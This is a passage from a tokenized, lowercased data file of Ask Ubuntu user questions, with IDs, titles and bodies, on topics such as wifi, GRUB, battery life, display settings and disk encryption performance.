//mirror01.th.ifl.net/ubuntu/ maverick-security main restricted deb http : //mirror01.th.ifl.net/ubuntu/ maverick-security universe deb-src http : //mirror01.th.ifl.net/ubuntu/ maverick-security universe deb http : //mirror01.th.ifl.net/ubuntu/ maverick-security multiverse deb-src http : //mirror01.th.ifl.net/ubuntu/ maverick-security multiverse deb http : //ppa.launchpad.net/awn-testing/ubuntu hardy main deb-src http : //ppa.launchpad.net/awn-testing/ubuntu hardy main # e-uae and other funky amiga stuff deb http : //ppa.launchpad.net/bjfs/ppa/ubuntu jaunty main
23391	unable to connect to wireless internet ( wifi ) through kde plasma desktop	i installed the kde plasma desktop through ubuntu software center . i am on ubuntu lucid lynx . after the install , im unable to connect to my wifi connection in the kde session . but i can connect to my wifi perfectly through gnome session . i 've tried a lot without much success . also kde does n't store my password correctly and keeps prompting for authorization again and again . some of the things that i noticed . network is detected , network name and strength is also displayed . other characteristics also appear properly . when the credentials are supplied , it accepts them and continually displays the message `` setting network address '' . however this process never succeeds . at this stage the password is repeatedly asked many times but the connection is never established . some of the other things that i did , i have also tried other things like restarting my modem and the computer . that did n't work . i tried to restart nm-applet and knetworkmanager . that did n't work either . ifconfig display all my interfaces and mac addresses correctly . since its working fine gnome the drivers are fine . this is sure a kde specific issue . other threads related to this on the interwebs do n't offer much information either . please share a solution for this .
23397	how can i sync rememberthemilk to my mozilla thunderbird ( or another application ) ?	i like rememberthemilk as a to-do list thing . it syncs well with my android phone , which is important . however , there does n't seem to be a simple option for syncing rtm with my ubuntu desktop . i currently use getting things gnome ! which is ok , but not ideal : syncing has to be done manually ( afaik ) and weirdly , the extra features of gtg are annoying : since rtm does n't support subtasks , i 'd rather not have the option of subtasks on my desktop to-do widget . i can sync rtm with my google calendar and use that through thunderbird , but this had some weird effects : for every day where i had a to do item with a deadline in the future ( i.e . every day ) i had an all day event in my calendar for that event : doubleplus suboptimal . so is there a better option ? preferably one that fits with thunderbird , since that 's where all my other organisational shenanigans are taking place .
23404	laptop battery life drastically decreased compared to windows 7	i am running ubuntu 10.10 on my dell studio xps 1640 and have about one hour of battery life in it , compared to about 2.5 hours running on windows 7 . this is with wireless and bluetooth on , but still , the difference seems incredible . what could be causing such a difference and is there a way to close the gap without losing core functionality ? edit : here 's some output from powertop . this is with bluetooth turned off and wifi turned on . the output seems pretty normal to me , but as indicated , this is about 1 hour of battery life on a full battery ... wakeups-from-idle per second : 476.2 interval : 10.0s power usage ( acpi estimate ) : 2.5w ( 1.2 hours ) top causes for wakeups : 30.0 % ( 167.2 ) d chrome 21.0 % ( 117.3 ) [ extra timer interrupt ] 13.9 % ( 77.4 ) [ kernel scheduler ] load balancing tick 3.4 % ( 18.9 ) d xchat 7.1 % ( 39.8 ) [ iwlagn ] < interrupt > 5.9 % ( 32.9 ) aptanastudio3 3.9 % ( 21.6 ) d java 2.7 % ( 14.9 ) [ tlb shootdowns ] < kernel ipi > 2.5 % ( 14.1 ) docky 1.8 % ( 10.0 ) nautilus 1.6 % ( 9.0 ) thunderbird-bin 1.0 % ( 5.5 ) [ ahci ] < interrupt > 0.9 % ( 5.0 ) syndaemon 0.8 % ( 4.3 ) [ kernel core ] hrtimer_start ( tick_sched_timer ) edit : after changing /proc/sys/vm/laptop_mode to 5 ( it was set to 0 ) , wakeups seem to have decreased , although usage still seems far too high : wakeups-from-idle per second : 263.8 interval : 10.0s power usage ( acpi estimate ) : 2.6w ( 0.9 hours ) edit : i seem to have discovered the main cause : i was using the open source ati drivers . i recently installed the official ati drivers and laptop battery life seems to have doubled since . edit : last edit . the previous 'solution ' of installing the official ati drivers turns out to be a non-solution . although it does increase battery life , my laptop resolution is maxed out at 1200x800 after a reboot . ( please note that this problem does not need answering in this question as it is a seperate case ) edit & solution : after more trial and error i finally found a custom ppa that patches maverick 's 2.6.35 kernel . my wakeups have now decreased from 450-1100 to a maximum of 120 ( ! ) . wakeups-from-idle per second : 110,2 interval : 15,0s power usage ( acpi estimate ) : 2,7w ( 0,7 hours ) top causes for wakeups : 19,2 % ( 25,7 ) [ extra timer interrupt ] 17,0 % ( 22,7 ) java 13,9 % ( 18,6 ) [ kernel scheduler ] load balancing tick 10,5 % ( 14,0 ) docky 8,8 % ( 11,7 ) [ iwlagn ] < interrupt > 7,5 % ( 10,0 ) nautilus 4,3 % ( 5,7 ) [ kernel core ] hrtimer_start ( tick_sched_timer ) 3,7 % ( 5,0 ) syndaemon 3,0 % ( 4,1 ) [ ahci ] < interrupt > 3,0 % ( 4,1 ) ksoftirqd/1 0,1 % ( 0,2 ) d flush-8:0 1,6 % ( 2,2 ) mysqld 1,2 % ( 1,7 ) python 0,7 % ( 1,0 ) [ kernel core ] iwl_bg_monitor_recover ( iwl_bg_monitor_recover )
23406	connect remote desktop viewer to mac on same local network with screen sharing enabled	i have a mac laptop ( 10.6 ) with screen sharing enabled . i would like to connect to it from my ubuntu desktop running 10.04 . i have remote desktop viewer installed . the laptop does n't show up in the `` nearby '' list but i can see the machine in the list when i go to machine- > connect and press find in the resulting panel . selecting the mac results in a wait and then a pop up error panel stating : avahi resolver failure : timeout reached so my question , is there an easy way to connect from ubuntu to mac ? if not with remote desktop viewer , then what is the `` preferred '' method ?
23408	can i install on 2 separate storage devices ?	i have a netbook , a flash drive ( 512mb ) , and an sd card ( 512mb ) and the ubuntu netbook edition is 696mb , is there any way i can put half of the installation on the flash drive and the other half on the sd card , and get it installed ?
23413	how can you quickly get the complete path to a file for use in terminal ?	how can you quickly get the complete path to a file for use in terminal ?
23418	what do i select for `` grub install devices '' after an update ?	after running update manager , a debconf window ( titled `` configuring grub-pc '' ) , popped up , requiring me to select the appropriategrub install devices for my system . i 've made no changes to grub or the filesystem recently , and i do n't remember what options i selected last time i did make a change . how do i know what to select ? i 'm assuming the wrong answer could render my system unable to boot . here 's the debconf dialog : here 's the window and text that is displayed when selecting `` help '' :
23422	is it a bad idea to run selinux and apparmor at the same time ?	my corporate policy says that linux boxes must be secured with selinux ( so that a security auditor can check the 'yes , we 're extremely secure ! ' checkbox for each server ) . i had hoped to take advantage of ubuntu 's awesome default apparmor security . is it unwise to run both apparmor and selinux ? ( if so , can this bad idea be mitigated with some apparmor and/or selinux tweaks ? ) update 1/28 -- kees cook has pointed out in his answer the dead simple reason why it 's a bad idea to run both -- the linux kernel says you can't1 . [ 1 more precisely , the linux security modules interface framework is designed for a single running implementation , and does not support more than a single running implementation. ]
23423	why am i getting this error while using gedit ?	( gedit:4778 ) : glib-gobject-critical ** : g_object_ref : assertion `object- > ref_count > 0 ' failed what does this error mean ?
23426	is there a cd image of ubuntu under 512mb ?	i only have a 512 mb flash drive and was wondering if there 's an iso for ubuntu that will fit on it . i really need to format my netbook .
23427	how can i get a list of all open windows in the command line ?	how can i produce a list of all open windows , including dialog boxes and duplicates , from the command line ?
23435	what 's the current status of migration-assistant ?	i 've never noticed the migration assistant i used to see when installing older versions of ubuntu . is it just hidden inside ubiquity , or is it gone completely ?
23446	how to avoid hdd spin up at system start ? ( ubuntu from ssd )	thanks to hdparm -b1 /dev/sdb my hdd does no longer spin up when powered up on boot . but after completing the bios post messages and starting ubuntu the hdd gets a signal over the sata data cable and spins up . leaving the data cable ( but still with plugged in sata power cable ) let the system boot up completely from my ssd without spinning up the hdd . what causes the hdd to spin up ? maybe grub2 ? edit : nope , does n't seem to be grub2 that spins up the drive . i just set up grub to show its menu without timer . nothings happens until i hit the ubuntu standard boot option , then a few seconds later the drive spins up . edit : dmesg | grep sdb : [ 7.080043 ] ata2.00 : qc timeout ( cmd 0xef ) [ 7.080057 ] ata2.00 : failed to identify ( spinup failed , err_mask=0x4 ) [ 9.830035 ] ata2 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 9.836555 ] ata2.00 : ata-8 : samsung hd105si , 1aj10001 , max udma/133 [ 9.836564 ] ata2.00 : 1953525168 sectors , multi 0 : lba48 ncq ( depth 31/32 ) [ 9.842364 ] ata2.00 : configured for udma/133 [ 9.842644 ] scsi 1:0:0:0 : direct-access ata samsung hd105si 1aj1 pq : 0 ansi : 5 [ 9.843249 ] sd 1:0:0:0 : [ sdb ] 1953525168 512-byte logical blocks : ( 1.00 tb/931 gib ) [ 9.843270 ] sd 1:0:0:0 : attached scsi generic sg1 type 0 [ 9.843487 ] sd 1:0:0:0 : [ sdb ] write protect is off [ 9.843497 ] sd 1:0:0:0 : [ sdb ] mode sense : 00 3a 00 00 [ 9.843590 ] sd 1:0:0:0 : [ sdb ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 9.844091 ] sdb : [ 9.845127 ] scsi 2:0:0:0 : cd-rom atapi ihds118 5 rl0c pq : 0 ansi : 5 [ 9.851182 ] sr0 : scsi3-mmc drive : 48x/48x cd/rw xa/form2 cdda tray [ 9.851191 ] uniform cd-rom driver revision : 3.20 [ 9.851554 ] sr 2:0:0:0 : attached scsi cd-rom sr0 [ 9.851802 ] sr 2:0:0:0 : attached scsi generic sg2 type 5 [ 9.942896 ] sdb1 [ 9.943773 ] sd 1:0:0:0 : [ sdb ] attached scsi disk
23450	how to set default xrandr settings ?	i 'm trying to enable dual monitors in ubuntu . this is working fine , but every time i do it , desktop effects is disabled . i think i 've found the reason why , though : https : //wiki.ubuntu.com/x/config/multihead/ as with the gnome xrandr configuration method , setting virtual to too large a value may result in a loss of hardware acceleration , and thus an inability to use compiz and its desktop effects . when i use the gnome monitor applet , or the monitors configuration in the system menu , the default xrandr settings puts the second monitor to the right of the first , and , as i found with this bug , for most monitors this creates a virtual desktop larger than the maximum 2048 horizontal resolution needed for hardware acceleration on my netbook hardware . so , it seems like if i can modify xrandr 's default settings so that it places the new desktop above or below ( north or south of ) the main lvds display , then hardware acceleration , and therefore compiz will continue to work . can anyone tell me , what is the easiest way to achieve this ? update : i have confirmed that multihead support with desktop effects and hardware acceleration works when i move the external monitor display north of the main lvds display . right now this involves the following process : plugging in the external monitor , starting the monitors configuration menu , desktop effects are disabled automatically ( and all of the windows on my workspaces are moved to the first workspace ) , repositioning the external display so that it is north of lvds display and clicking apply , and then navigating to the appearance menu and telling it to reenable desktop effects . is there a simpler way do this ? update 2 : ok , so i thought that perhaps the gnome monitors configuration screen was trying to be clever , and might be disbling desktop effects . so , i just tried using the xrandr command-line client instead , as follows : xrandr -- output vga1 -- above lvds1 when i do that , desktop effects are still disabled , and i need to manually reenable them . this , despite the fact that hardware acceleration works , and there is never a point where hardware acceleration stops working because the horizontal dimension of the virtual display is too large . so what program is trying to be clever , and is turning off desktop effects when it does n't need to ? and how do i make it stop ? if there were a way to re-enable desktop effects from the command line , which i could then put into a script along with the proper xrandr invocation , i would accept that as a workaround . update 3 : ok , here 's my script to enable a second monitor with desktop effects . it might be evil , i 'm not sure : second-monitor.sh xrandr -- output vga1 -- above lvds1 sleep 3 compiz -- replace & the sleep statement might not be necessary . if there 's a better way to do this , please let me know . update 4 : this is a dell mini inspiron 1012 . here are my system specifications : lspci -vv 00:02.0 vga compatible controller : intel corporation n10 family integrated graphics controller subsystem : dell device 041a control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 29 region 0 : memory at f0b00000 ( 32-bit , non-prefetchable ) [ size=512k ] region 1 : i/o ports at 18d0 [ size=8 ] region 2 : memory at d0000000 ( 32-bit , prefetchable ) [ size=256m ] region 3 : memory at f0900000 ( 32-bit , non-prefetchable ) [ size=1m ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 00:02.1 display controller : intel corporation n10 family integrated graphics controller subsystem : dell device 041a control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 region 0 : memory at f0b80000 ( 32-bit , non-prefetchable ) [ size=512k ] capabilities : < access denied > lsmod | grep i915 i915 287458 2 drm_kms_helper 29329 1 i915 drm 162409 3 i915 , drm_kms_helper intel_agp 24375 2 i915 i2c_algo_bit 5028 1 i915 video 17375 1 i915
23454	how to view a pe exe/dll file version information ?	in windows there is a version information page in an executable/library file properties window . how to view that info in ubuntu ?
23461	synchronize 4gb of files	is there any service with linux client that can deal with synchronizing 4 gb of data ? by synchronizing i mean keeping all data on their server with automatic upload when files are changed . i am happy with dropbox , but for now there is only 2gb free .
23465	installing grub2 on one bootable usb stick	hi have tried installing ubuntu and a few other linux distro 's without luck on one usb stick . i have seen other solutions but they only work with iso images . what i need to do is to install grub2 on a usb and then partition it and install multiple distro 's on it but i do n't know how to install grub on a usb . thanks in advance ,
23468	copy function corrupt	using u10.10 - whether using edit/copy , ctrl-c or right click copy in any program clipboard shows corrupt characters eg copying `` characters '' = - $ on clipboard . using parcellite as clipboard manager now to see whats happening . have re-installed whatever comes up as `` copy '' in synaptic . this problem is 2 weeks old and can not think of any particular cause . its most distressing as its on a vital machine .
23470	how can i install windows from within ubuntu so that i can boot into it windows when i start my computer ?	i 'm not looking for an emulator . i would like to install windows from within ubuntu so that i can boot into windows when i restart my computer . i would install windows normally but my usb ports are shot and i do n't have any optical drives . i 'd appreciate any help .
23473	how to update to openoffice.org 3.3 ?	openoffice.org 3.3 is released . as the past shows , official 10.10 repos are unlikely to update to 3.3 . how do i best update to 3.3 ?
23474	how to enable 'send user package usage info ' , after installation ?	when i originally installed ubuntu ( first time using linux ) , i chose to not participate in sending info about package usage ( ti was an install-time option ) ... i was in pure experimental mode and felt that any info i sent would be rather meaningless . i 've now got a good sense of what i want/need , and i 'd like to know how to enable this option..
23475	opening a nautilus bookmark launches vlc / browser	i came back after a month long vacation to check out my parents computer , only to realize that the bookmarks ( e.g . places â downloads ) opened up vlc . to try and fix this , i uninstalled vlc . but when i open those bookmarks , the browser ( firefox ) launches instead . how do i fix this and get nautilus to launch ? ps . i 'm using docky , and opening mounts from docky also has the same behavior .
23476	what is the best solution for document archiving ?	i 'm looking for a utility that helps me ( and my colleagues ) to archive documents in a systematic manner ( like zeitgeist but permanent ) . the utility have to clean-out old document from desktops and store them on a server ( as automatic as possible and consistent ) maybe from just a few locations ( document directory ) documents shall be stored on cheap large media for many years to come - hard disk and file system maybe ? easy to maintain and manage for a small organization . documents have to be easy to find and restore one systematic manner could be a directory-structure by year , month , user or user , year , month . its a plus if documents could be linked to a project , if documents could be search-able and if document could also be mail , im-discussions not only openoffice traditional documents . any ideas ?
23482	what does rc , in bashrc , nanorc stand for ?	is there any long-form , if at all ? or is it just a tradition from the 80 's ?
23489	what is the performance overhead of encrypted /home ?	i have a netbook with windows on the second partition and xubuntu ( / and /home ) on the third partition . i selected to encrypt my home folder during installation . the performance of the netbook is adequate for the small machine that it is , but i 'm looking to improve performance . i could not find much information about the overhead ( cpu or drive ) associated with home partition encryption . i ran the following , writing to my home partition as well as the the mounted windows partition : dd if=/dev/zero of=~/dummy bs=512 count=10240 dd if=/dev/zero of=/media/windows/dummy bs=512 count=10240 the first returned 2.4mb/s and the second returned 2.5mb/s . can i therefore deduce that there is very little overhead to home folder encryption ? i 'm not sure if the different filesystems will make any difference ( / and /home are ext3 ) . update 1 i do n't know why i did n't use /tmp instead of the mounted windows folder . only /home is encrypted , so /tmp is unencrypted ext3 . the results of the dd as above are astounding : ~ : 2.4 mb/s /tmp : 42.6 mb/s comments please ? the reason i am asking this is that disk access on the netbook is noticeably slow . update 2 i timed each of the dd operations with time : ~ : real 0m2.217s user 0m0.028s sys 0m2.176s /tmp : real 0m0.152s user 0m0.012s sys 0m0.136s see also : discussion on ubuntuforums.org and bug report ( 2012/05/11 : now seems to be a bug relating to ssd ) edit : output of mount : /dev/sda3 on / type ext3 ( rw , noatime , errors=remount-ro , user_xattr , commit=600 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/user/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=user ) update 2012/05/01 : more related links for reference : an ( old ) phoronix test , a similar question here , a duplicate question here and a similar superuser question . a good summary answer here suggests that performance penalties are only noticeable on small/netbook ( atom ) processors and ssds .
23491	how to change capslock key to produce `` a '' ?	while typing i often hit the capslock key instead of the a key . ( qwertzu keyboard ) this is quite annoying because the moment i realise that i hit the wrong key , i will have to delete multiple character/lines of text an rewrite them in the right form . i am searching for a way to prevent this . i have found a possibility to disable the capslock key in keyboard layout options . but this would in my case mean that instead of writing an a i would write nothing . positive - > i do n't have to rewrite a whole line , but only one character negative - > it 's not that obvious that i hit the wrong key , as a missing character is not perceivable as an upper-case line of text . i would therefore prefer a possibility to map capslock to a . thus when hitting capslock an a character would be written . positive - > if i hit capslock instead of a i get the output i actually wanted to type . negative - > if i hit capslock in any other context i will get an a character . as i do n't ever intentionally use the capslock key this would not really pose a problem . ( i think , or does it ? ) my question : so how do i change to a ? and is there any case where this could be dangerous/provoke unwanted behaviour ?
23498	grub fails to install	i 'm trying to install ubuntu 10.10 on a work pc ( 32bit ) to be dual-booting with win xp . my partition layout is : /dev/sda -- sda1 - 250gb ntfs winxp /dev/sdb -- sdb1 - 160gb ntfs /dev/sdc -- sdc1 - 161gb ext4 ( this is where ubuntu is -- sdc5 - 4 gb swap i tried following the suggestion of the answer to this question , but get the following in the terminal as a response : root @ ubuntu : / # sudo grub-install /dev/sda sudo : unable to resolve host ubuntu /usr/lib/grub/grub-mkconfig_lib : 38 : can not create /dev/null : permission denied /usr/sbin/grub-probe : error : can not find a device for /boot/grub ( is /dev mounted ? ) . how should i proceed ? i 'd really like to move away from windows being my only development environment . edit : it would seem that this problem is due to a non-stardard bios and hardware restrictions on my work computer . i managed to install ubuntu at home with no issues . do n't know how to close a question as too localised / no real question ? many thanks to mr rooney for trying to help .
23502	how to install wine from already downloaded package ?	i downloaded wine from windows but do n't know how to install it in ubuntu . please help .
23503	network printer gets disabled occasionally	i 'm running ubuntu 10.04 and have a hp-laserjet-3005p network printer . occasionally ( perhaps related to rebooting ) the printer , which is setup as the default printer , becomes disabled . after realizing that i 'm not getting anything printed , i must then open printing preferences and click on `` enabled '' . then it prints happily until the next time that it becomes disabled ... any ideas why this is happening and/or how i could fix it ? i know i 'm giving very little information , i ca n't think of anything else to give ... if there 's something i should be providing , please let me know .
23506	how can i install new wireless card driver before i insert card in pc ?	i just purchased an addon nwp210 wires pci card . how can i install the drivers for this before i replace my current wireless card with it . ( i need to install it before i swap them as i will have no internet connection until i install the drivers for the new one )
23508	how to automatically change volume level when un-/plugging headphones ?	what i want is the following : when i plug in my headphones , i want the sound to be un-muted and set to a specific volume level . when i unplug my headphones , i want the sound to be muted ( or set to a specific volume level ) . setting the volume levels is n't the problem , but i somehow need to do this when un-/plugging the headphones , so i 'm looking for a way to get notified of those events . i quickly found /proc/asound/card0/codec # 0 to indicate whether headphones are plugged in or not , so i tried to monitor it using inotifywait and change the volume level based on modified notifications . unfortunately inotifywait failed because proc is n't an ordinary filesystem . are there other ways to do this ( maybe via pulseaudio ) ? audio device : intel hda , audio codec : conexant cx20585 . to summarize what i 've tried so far : ear candy : did n't run at all on my system . seems to be an abandoned project ? the code posted by karl bielefeldt might work on some hardware , it does n't on mine . the idea from stephenpaulger fails due to the lack of a 'speaker ' channel . motivated by aking1012 i made it work by hacking around in the kernel code ( after finding the jack sensing code of the codec ) , but that 's a rather cumbersome solution . so , i 'm still looking for an easy way to do this .
23511	how do i stop the speaker from unmuting after wake-up ?	i am using ubuntu 9.10 netbook remix . some seconds after wake-up , the speaker unmutes , even if it was muted before . i 'd like to have it muted always after suspend . i created a rule in /etc/pm/sleep.d but it does n't work , probably because it is unmuted after some seconds . edit i have the impression that this gnome soundcontrol does the unmuting , but i am not sure . i looked thru all the gconf but could n't find an option .
23512	sudo : setuid must be root	i changed the ownership of my /usr directory to 777 by mistake and now my system give this error whenever i try to use sudo : sudo : setuid must be root
23517	how to execute a shell-command in vim , and have the result printed below ?	i 'd like to edit shell commands from vim , and execute them from vim . currently i use ! ! sh ( pipes current line to command sh ) , but this removes the line itself . is it possible to execute the command in a shell , and paste the result below that line ?
23518	ca n't enable intel driver 82845g/gl ( brookdaleg ) chipset	my desktop has intel 82845g/gl ( brookdaleg ) chipset ca n't enable intel driver . runs well with vesa . but when i try to enable the intel driver the xlog shows an error that no device detected and boots in text mode what should i do to solve this ?
23520	how to manually configure nameserver without breaking ubuntuone ?	if i allow the network manager to `` manage '' my nameserver , it resolves to the ip address of the router . this effectively makes both evolution and opera unuseable , slowing them both to a crawl ( i am sure other things are affected , but i have yet to notice ) . however , if i manually configure resolv.conf with the actual nameservers pulled from my router , and make it immutable with the `` chattr -i '' command , both evolution and opera run as they should , but this breaks ubuntu one . i get the dreaded list of `` unknown '' everythings ... any idea how to make both function properly ?
23522	how can i get a redundant filesystem which grows easily ?	i want to use ubuntu server on a computer which i want to use for my backups . i would like to be able to add extra disk space if that would be required in the future . basically , i like what the drobo does , however , i do n't like that it uses a proprietary file system . which means that i totally depend on them if it breaks . so i have looked into mdadm for raid 5 + lvm . however , that will not use all disk space if new disk are larger than the old ones . ( lvm for the snapshots ) i think zfs could do the trick , however , that is unsupported on linux . btrfs is a bit too young to trust my files to , it is my backup after all , i want stuff to be safe there . another reason for me to want an ubuntu machine instead of a nas , is that i want to run other stuff on it as well , like django , mythtv backend and mail server . so what options do i have if i want my files to be stored in a redundant fashion , and to be able to take snapshots of these backups as well ? i 'm still in the research phase , so i am open for suggestions . : )
23523	how can i make ubuntu/gnome look better i.e more smaller and compact ?	i like ubuntu and i do n't use windows except at office but i have always felt that every thing in ubuntu/gnome is a bit bigger than it should be i.e the fonts , desktop icons , the window borders and every thing else . this thing really annoys me when i am working in eclipse . as a developer , desktop real estate is really important for me and i cant afford to waste it . so the question is how can i make things look more like windows i.e crispier and smaller ? i have attached the screen shot of same version of eclipse running on windows and ubuntu at same resolution ( 1400*900 ) update : i am actually using ubuntu 10.10 but at the time when i wrote this question i only had 9.10 machine available to me so i used it to get screen shot . i want things to be compact , not exactly windows like . i say windows because it looks lot more space efficient and i do n't like the wasted space . also i know that i can tweak almost every aspect of gnome seperately but i want something that can do this for me like some theme or some thing else that can later be easily undone ( if i dont like it )
23528	hardware issues on samsung nf208 ( nf210 )	i 'm trying to get ubuntu 10.10 running on my wife 's samsung nf208 ( same spec as nf210 , but shipped without os ) , and i have run into a pile of problems : at first , there were problems with audio , display brightness , and wifi , so i reinstalled ubuntu from scratch . after reinstalling , the audio has started working but the wifi loses network access all the time and then it takes 5-10 minutes for it to reconnect to the network . also , display brightness is at its lowest . i have tried to use the brightness command but it wo n't run . is this system utterly incompatible with ubuntu , or are there working wifi and display drivers for it somewhere ? i have googled for days but have n't found anything useful . help me . update : i never got it working properly . i came across lots of useful tips and tricks over at the forum linked to in the accepted answer but i just was n't able to get it working and stable enough for the intended use . hopefully a future version of ubuntu and/or the samsung tools will solve that . related thread over at the other forum : http : //www.voria.org/forum/viewtopic.php ? f=3 & t=682
23532	which ubuntu kernel package should i run in a xen domu	i have a xen domu provided by a 3rd party vendor , and am running ubuntu 10.04 on it . is there a more xen-specific kernel i am running than that provided by the linux-image-2.6.32-21-server package ? i note there is an equivalent -virtual package , but i have the linux-virtual package installed and my kernel is still happily -server . james @ nephos : ~ $ uname -a linux nephos 2.6.32-21-server # 32-ubuntu smp fri apr 16 09:17:34 utc 2010 x86_64 gnu/linux should i be looking to install the -virtual image directly ( contrary to the package description ? ) the background to this is that we 're seeing some performance issues , and now suddenly some fs corruption issues on an ext3 filesystem running on a xen virtual block device , and the vendor have asked me if we 're running a xen-specific kernel -- i installed using their supplied image/installer , but they primarily recommend/support centos .
23533	how to protect ubuntu from fork bomb	i heard someone talking about a fork bomb , i did some research and found some dreadful information about some strange looking characters people can have you type at the command line and as a result do bad things on the computer . i certainly would not issue commands i do not understand but one never knows what can happen . i heard that some os allows the administrator to place some limit on user processes to mitigate the effects of fork bombs , is this protection in ubuntu by default or would a person with sudo privilege have to set this ? if so , how ?
23534	is it possible to drag files with right click ?	is there a way ( maybe using some script in nautilus or something ) so that you can drag files with the right mouse button and when you release , you 're shown the context menu ? if it can even be achieved using some modifier key + left button , i 'm ok with it . but shift + left button forces a move , ctrl + lb forces a copy , alt + lb does a `` move window '' , super + lb does ... well ... nothing special , i believe .
23538	squid proxy problem to arised after update	when i restart squid web proxy service , i receive the following errors . what are these errors ? /etc/init.d/squid restart rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service squid restart since the script you are attempting to invoke has been converted to an upstart job , you may also use the restart ( 8 ) utility , e.g . restart squid restart : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.64 '' ( uid=1000 pid=2979 comm= '' restart ) interface= '' com.ubuntu.upstart0_6.job '' member= '' restart '' error name= '' ( unset ) '' requested_reply=0 destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) ) has anybody else encountered this problem ?
23546	why am i not able to execute an application created by qt ? also , i am not able to give execute permissions to it	why am i not able to execute an application created by qt ? also , i am not able to give execute permissions to it . when i click `` allow executing file as program '' , it automatically unchecks .
23549	is there a difference between the ' & & ' and ' ; ' symbols in a standard bash terminal ?	they seem to both signal bash to commence with another command following the symbols but is there a distinct difference ?
23552	dell studio 1555 overheating and fan problem	the model of my laptop is dell studio 1555 ( ati graphic card and a06 bios ) . i am using dual boot ( vista and ubuntu ) . there are n't any problems related to heat and fan while using vista . however with ubuntu , the laptop overheats and the fans make noise . i tried to solve this problem with cpu scaling but that does n't work . should i update the bios ?
23555	crash at high cpu usage	my machine seems to die whenever the cpu does any large amount of work . this is like running a few programs and transferring files . i did n't have any issues with xp . i did n't install any mobo drivers , could that be a problem ? ? any thoughts would help ! hardware : cpu : amd 3700+ athlon 64 939p rt 2.20 gigahertz mobo : msi k8ngm2-fid gf6150 939 ram : 2 x 512mb of ddr 400 ram video card : msi n9500gt-md512m hd : maxtor 200gb sata + wd green 2tb sata updated : when the machine does shut off , the power light does a slow blink . to turn it back on , i have turn the power supply off for a bit and/or pull the power cord out until the light turns off .
23556	flash breaking pulseaudio ?	since posting this question , it has been revealed that the problem was with mpd â not flash . here is the question i posted in an attempt to find a fix . every time a flash object with sound ( such as a video ) loads in my browser ( chromium or firefox ) , it seems to break pulseaudio . further flash content will play just fine , but other software , such as mpd , will not be heard . i can reset this problem by ensuring that no instance of flash are running in my browser and running pulseaudio -k , but the problem just comes back as soon as another flash object initialises . in being a little more specific , if i have sound playing ( such as with mpd ) and load a flash object , sound continues to play but flash does n't output any sound . if i stop playing sound and then load the flash object , flash gets sound and seemingly takes control of pulseaudio until pulseaudio -k. may or may not be related : when flash does n't get to output sound it tends to crash chromium . i ca n't say if this is only when flash gets control of pulseaudio or not , as it does n't always crash . i 'm running the latest version of flash , just downloaded and installed from adobe 's site using their 32-bit deb . i have tried flashplugin-installer but the problem is the same . running ubuntu 10.10 . any idea how i can fix this , or why it 's happening ? does it matter that i 'm running mpd as root ?
23557	virtualbox guest ( win 7 host ) locks up on network access	i 've got ubuntu 10.10 installed on a virtual machine ( virtualbox ) . it works great other than it locks up after 5-10 minutes of doing something over the network . this includes ssh and browsing . my typical test is to let pandora run in a browser in the virtualbox for as long as possible . ussually within a couple songs the ubuntu guest hangs and i can not do anything to it other than power down the virtual machine . i 've tried getting to a plain text tty ( ctrl+alt+f1-f6 ) to no avail . the virtual box appears to have completely hung . note the guest os will run for days doing various things ( mostly local development ) without hanging . only when doing something that requires network access does it hang . some specs : virtualbox 3.2.12 , windows 7 w/8.00 gb ram intel i5 quad core ( 760 @ 2.8 ghz ) this issue at the virtualbox discussion board may possibly be related . this question may be related , but seems more tied to 3d performance . still it may imply i may need to upgrade to virtualbox 4.0.0 : ( i 'll go ahead and experiment with this ) how can i get my guest to not freeze ?
23562	why ca n't i see the menubar in some applications ?	i do n't run gnome-panel normally . most menubars work correctly . however , with wxmaxima and audacity , they are not showing . when i start gnome-panel and add an appmenu , i can see the menus again . without panel : with panel : i get no relevant errors when i run from a terminal . why does this happen and what could i do to fix it ? against which package would i file this if this is a bug ?
23563	why is `` shutdown p 01:00 '' not working ?	
23566	input signal out of range ?	whenever i try to run a 3d app , i get this error , and i ca n't do anything ; i have a nvidia geforce 6150se nforce 430 graphics card .
